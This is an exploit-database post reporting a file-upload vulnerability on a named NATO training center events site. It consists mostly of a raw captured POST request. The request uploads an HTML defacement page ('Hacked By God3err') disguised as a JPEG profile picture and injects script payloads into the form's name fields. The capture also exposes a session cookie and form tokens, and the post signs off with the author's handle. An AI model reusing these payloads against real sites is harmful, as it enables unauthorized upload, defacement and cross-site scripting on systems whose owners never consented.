NATO Training Center Upload Vulnerability

2018.05.09
tr God3err (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

NATO Upload Vulnerability ---------------------------------------------------------------- Site: https://events.jftc.nato.int ---------------------------------------------------------------- Videos : https://www.youtube.com/watch?v=sxfdmc-FE5M ---------------------------------------------------------------- Vulnerable POST Code : ---------------------------------------------------------------- 17:28:39.016 [4438ms] [total 4438ms] Status: 200[OK] POST https://events.jftc.nato.int/user/26426/userdata?element_parents=userdata/user_picture&ajax_form=1&_wrapper_format=drupal_ajax&_wrapper_format=drupal_ajax Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE ] Content Size[-1] Mime Type[application/json] Request Headers: Host[events.jftc.nato.int] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.7.2] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate, br] X-Requested-With[XMLHttpRequest] Referer[https://events.jftc.nato.int/user/26426/userdata] Content-Length[7132] Content-Type[multipart/form-data; boundary=---------------------------23222661824199] Cookie[SSESS15be87fcc393b12e70eb4c4f98ed97bc=yV8zL34h9yB25fKnjwRcU6TDMwW6JnpCKenpm1T6ghA] Connection[keep-alive] Post Data: POST_DATA[-----------------------------23222661824199 Content-Disposition: form-data; name="name" -----------------------------23222661824199 Content-Disposition: form-data; name="first_name" ">ALERT(0); -----------------------------23222661824199 Content-Disposition: form-data; name="surname" ">ALERT(0); -----------------------------23222661824199 Content-Disposition: form-data; name="gender" F -----------------------------23222661824199 Content-Disposition: form-data; name="nato_rank_title" OR3 -----------------------------23222661824199 Content-Disposition: form-data; name="national_title" TUR -----------------------------23222661824199 Content-Disposition: form-data; name="service" ARMY -----------------------------23222661824199 Content-Disposition: form-data; name="nationality" Turkey (TUR) -----------------------------23222661824199 Content-Disposition: form-data; name="id_number" 1213123123123 -----------------------------23222661824199 Content-Disposition: form-data; name="nato_security_clearance" NATO Secret -----------------------------23222661824199 Content-Disposition: form-data; name="organization[select]" 1 GNC -----------------------------23222661824199 Content-Disposition: form-data; name="organization[other]" -----------------------------23222661824199 Content-Disposition: form-data; name="contact_phone" 05******** -----------------------------23222661824199 Content-Disposition: form-data; name="ns_wan_address" safasfasf -----------------------------23222661824199 Content-Disposition: form-data; name="files[user_picture]"; filename="index.jpg" Content-Type: image/jpeg <html><h1>Hacked By God3err<h1></html> -----------------------------23222661824199 Content-Disposition: form-data; name="user_picture[fids]" -----------------------------23222661824199 Content-Disposition: form-data; name="security_clearance_fid[fids]" 6741 -----------------------------23222661824199 Content-Disposition: form-data; name="height" 168 -----------------------------23222661824199 Content-Disposition: form-data; name="eye_color" Blue -----------------------------23222661824199 Content-Disposition: form-data; name="marital_status" married -----------------------------23222661824199 Content-Disposition: form-data; name="birth_date" 1974-05-06 -----------------------------23222661824199 Content-Disposition: form-data; name="birth_town" burdur -----------------------------23222661824199 Content-Disposition: form-data; name="birth_country" Afghanistan (AFG) -----------------------------23222661824199 Content-Disposition: form-data; name="form_build_id" form-vx5EXbx7djtg3TbaVszCcjOGLwqKe4DIHifWokHwsbY -----------------------------23222661824199 Content-Disposition: form-data; name="form_token" AsFqzDYst8b5UPULTTcOzKKSHtro8GetqNghSR9N-y8 -----------------------------23222661824199 Content-Disposition: form-data; name="form_id" simple_form -----------------------------23222661824199 Content-Disposition: form-data; name="_triggering_element_name" user_picture_upload_button -----------------------------23222661824199 Content-Disposition: form-data; name="_triggering_element_value" Upload -----------------------------23222661824199 Content-Disposition: form-data; name="_drupal_ajax" 1 -----------------------------23222661824199 Content-Disposition: form-data; name="ajax_page_state[theme]" bstheme -----------------------------23222661824199 Content-Disposition: form-data; name="ajax_page_state[theme_token]" -----------------------------23222661824199 Content-Disposition: form-data; name="ajax_page_state[libraries]" autologout/drupal.autologout,bootstrap/popover,bootstrap/tooltip,bstheme/bootstrap-scripts,bstheme/global-styling,core/drupal.active-link,core/drupal.date,core/drupal.states,core/html5shiv,core/jquery.form,core/jquery.form,d_filtertable/filtertable,d_signup/signup_registrant_info_sticky,d_signup/signup_select_row,file/drupal.file,file/drupal.file,hide_submit/hide_submit,system/base -----------------------------23222661824199-- ] Response Headers: Server[nginx] Date[Tue, 08 May 2018 14:28:43 GMT] Content-Type[application/json] Cache-Control[must-revalidate, no-cache, private] x-ua-compatible[IE=edge] Content-Language[en] X-Content-Type-Options[nosniff] X-Frame-Options[SAMEORIGIN] Expires[Sun, 19 Nov 1978 05:00:00 GMT] Vary[Accept-Encoding] x-generator[Drupal 8 (https://www.drupal.org)] x-drupal-ajax-token[1] Content-Encoding[gzip] x-request-id[v-1bf98b42-52cc-11e8-903d-22000a271e78] x-ah-environment[prod] x-varnish[713984183] Age[0] via[1.1 varnish-v4] X-Cache[MISS] Accept-Ranges[bytes] X-Firefox-Spdy[h2] ------------------------------------------------------------------------ //God3err - Thanks For Reading ------------------------------------------------------------------------ Twitter : @KizilKullanici ------------------------------------------------------------------------ ☭ God3err ☭ ------------------------------------------------------------------------

References:

https://www.youtube.com/watch?v=sxfdmc-FE5M


See this note in RAW Version
Vote for this issue:
57%
43%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top